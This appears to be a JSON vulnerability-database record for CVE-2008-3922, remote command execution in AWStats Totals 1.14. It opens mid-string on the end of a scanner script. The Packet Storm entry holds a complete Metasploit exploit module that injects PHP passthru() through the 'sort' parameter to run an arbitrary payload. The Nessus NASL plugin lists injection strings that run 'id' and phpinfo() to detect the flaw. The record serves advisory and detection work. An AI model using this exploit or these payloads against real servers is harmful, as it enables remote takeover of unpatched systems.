A WAF might be blocking your request\"\n end\n end\n\n --output\n if #output>0 then\n return table.concat(output, \"\\n\")\n end\nend\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "packetstorm": [{"lastseen": "2016-12-05T22:14:01", "description": "", "published": "2011-05-26T00:00:00", "type": "packetstorm", "title": "AWStats Totals 1.14 Remote Command Execution", "bulletinFamily": "exploit", "cvelist": ["CVE-2008-3922"], "modified": "2011-05-26T00:00:00", "id": "PACKETSTORM:101698", "href": "https://packetstormsecurity.com/files/101698/AWStats-Totals-1.14-Remote-Command-Execution.html", "sourceData": "`## \n# $Id: awstatstotals_multisort.rb 12715 2011-05-25 10:45:36Z patrickw $ \n## \n \n## \n# This file is part of the Metasploit Framework and may be subject to \n# redistribution and commercial restrictions. Please see the Metasploit \n# Framework web site for more information on licensing and terms of use. \n# http://metasploit.com/framework/ \n## \n \n \nrequire 'msf/core' \n \n \nclass Metasploit3 < Msf::Exploit::Remote \nRank = ExcellentRanking \n \ninclude Msf::Exploit::Remote::HttpClient \n \ndef initialize(info = {}) \nsuper(update_info(info, \n'Name' => 'AWStats Totals =< v1.14 multisort Remote Command Execution', \n'Description' => %q{ \nThis module exploits an arbitrary command execution vulnerability in the \nAWStats Totals PHP script. AWStats Totals version v1.0 - v1.14 are vulnerable. 
\n}, \n'Author' => [ 'patrick' ], \n'License' => MSF_LICENSE, \n'Version' => '$Revision: 12715 $', \n'References' => \n[ \n['CVE', '2008-3922'], \n['OSVDB', '47807'], \n['BID', '30856'], \n['URL', 'http://userwww.service.emory.edu/~ekenda2/EMORY-2008-01.txt'], \n], \n'Privileged' => false, \n'Payload' => \n{ \n'DisableNops' => true, \n'Space' => 512, \n'Compat' => \n{ \n'PayloadType' => 'cmd', \n'RequiredCmd' => 'generic perl ruby bash telnet', \n} \n}, \n'Platform' => 'unix', \n'Arch' => ARCH_CMD, \n'Targets' => [[ 'Automatic', { }]], \n'DisclosureDate' => 'Aug 26 2008', \n'DefaultTarget' => 0)) \n \nregister_options( \n[ \nOptString.new('URI', [true, \"The full URI path to awstatstotals.php\", \"/awstatstotals/awstatstotals.php\"]), \n], self.class) \nend \n \ndef check \nres = send_request_cgi({ \n'uri' => datastore['URI'], \n'vars_get' => \n{ \n'sort' => '\"].phpinfo().exit().$a[\"' \n} \n}, 25) \n \nif (res and res.body.match(/localhost/)) \nreturn Exploit::CheckCode::Vulnerable \nend \n \nreturn Exploit::CheckCode::Safe \nend \n \ndef exploit \ncommand = Rex::Text.uri_encode(payload.encoded) \nsploit = datastore['URI'] + '?sort=\"].passthru(\\'echo%20YYY;' + command + ';echo%20YYY;\\').exit().%24a[\"' \n \nres = send_request_raw({ \n'uri' => sploit, \n'method' => 'GET', \n'headers' => \n{ \n'User-Agent' => 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)', \n'Connection' => 'Close', \n} \n}, 25) \n \nif (res) \nprint_status(\"The server returned: #{res.code} #{res.message}\") \n \nm = res.body.match(/YYY\\n(.*)\\nYYY/m) \n \nif (m) \nprint_status(\"Command output from the server:\") \nprint(\"\\n\" + m[1] + \"\\n\\n\") \nelse \nprint_status(\"This server may not be vulnerable\") \nend \nelse \nprint_status(\"No response from the server\") \nend \nend \n \nend \n \n`\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": 
"https://packetstormsecurity.com/files/download/101698/awstatstotals_multisort.rb.txt"}], "nessus": [{"lastseen": "2021-01-20T09:25:08", "description": "The remote web server is running a version of awstatstotals.php which\ndoes not properly sanitize its 'sort' argument. An attacker can run\narbitrary commands on the remote host within the context of the web\nserver.", "edition": 26, "published": "2008-08-27T00:00:00", "title": "AWStats Totals awstatstotals.php multisort() Function sort Parameter Arbitrary PHP Code Execution", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2008-3922"], "modified": "2008-08-27T00:00:00", "cpe": [], "id": "AWSTATSTOTALS_SORT_REMOTE_EXEC.NASL", "href": "https://www.tenable.com/plugins/nessus/34055", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(34055);\n script_version(\"1.20\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/19\");\n\n script_cve_id(\"CVE-2008-3922\");\n script_bugtraq_id(30856);\n script_xref(name:\"EDB-ID\", value:\"17324\");\n\n script_name(english:\"AWStats Totals awstatstotals.php multisort() Function sort Parameter Arbitrary PHP Code Execution\");\n script_summary(english:\"run a command through awstatstotals.php?sort\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote web server contains a PHP script that is prone to arbitrary\ncode execution.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote web server is running a version of awstatstotals.php which\ndoes not properly sanitize its 'sort' argument. 
An attacker can run\narbitrary commands on the remote host within the context of the web\nserver.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.securityfocus.com/archive/1/20080826165439.GQ10038@dx4.org\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.telartis.nl/en/awstats\" );\n script_set_attribute(attribute:\"solution\", value:\"Upgrade to Telartis AWStats Totals 1.15\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"d2_elliot_name\", value:\"Awstats Totals <= 1.14 RCE\");\n script_set_attribute(attribute:\"exploit_framework_d2_elliot\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'AWStats Totals multisort Remote Command Execution');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_cwe_id(94);\n\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2008/08/27\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"CGI abuses\");\n script_copyright(english:\"This script is Copyright (C) 2008-2021 Tenable Network Security, Inc.\");\n\n script_dependencies(\"http_version.nasl\");\n script_exclude_keys(\"Settings/disable_cgi_scanning\");\n script_require_ports(\"Services/www\", 80);\n\n exit(0);\n}\n\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"http.inc\");\n\nif (get_kb_item(\"Settings/disable_cgi_scanning\")) exit(0);\n\nport = get_http_port(default: 80);\n\nif (thorough_tests)\n dirs = get_kb_list(string(\"www/\", port, \"/content/directories\"));\nif (isnull(dirs)) dirs = make_list(\"\", \"/stat\", 
\"/awstatstotals\");\ndirs = list_uniq(make_list(dirs, cgi_dirs()));\nreport = \"\";\n\nattacks = make_list(\n'/awstatstotals.php?sort=\"].passthru(\\'id\\').exit().%24a[\"',\n'/awstatstotals.php?sort={%24{passthru(chr(105).chr(100))}}{%24{exit()}}',\n'/awstatstotals.php?sort=\"].phpinfo().exit().%24a[\"',\n'/awstatstotals.php?sort={%24{phpinfo()}}{%24{exit()}}' );\n\nforeach d (dirs)\n{\n foreach a (attacks)\n {\n u = strcat(d, a);\n w = http_send_recv3(method:\"GET\",item: u, port: port);\n if (isnull(w))\n if (report)\n break;\n else\n exit(0);\n r = w[2];\n if (\"phpinfo\" >< a)\n {\n if (\n \"<title>phpinfo()</title>\" >< r && \n \"HTTP_HOST\" >< r &&\n \"SERVER_PORT\" >< r &&\n egrep(string: r, pattern: \"X-Powered-By.*PHP/[1-9]\\.\") &&\n egrep(pattern:\"\\>PHP Version (.+)\\<\", string:w[2])\n )\n {\n report = strcat(report, '\\n', build_url(port: port, qs: u), '\\nran the phpinfo() function command successfully.\\n');\n break;\n }\n }\n else\n {\n if (egrep(string: r, pattern: \"^uid=[0-9]+.* gid=[0-9]+\"))\n {\n report = strcat(report, '\\n', build_url(port: port, qs: u), '\\nran the id command successfully and produced the following output:\\n', chomp(r), '\\n');\n break;\n }\n }\n }\n if (report && ! thorough_tests) break;\n}\n\nif (report) security_hole(port: port, extra: report);\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}]}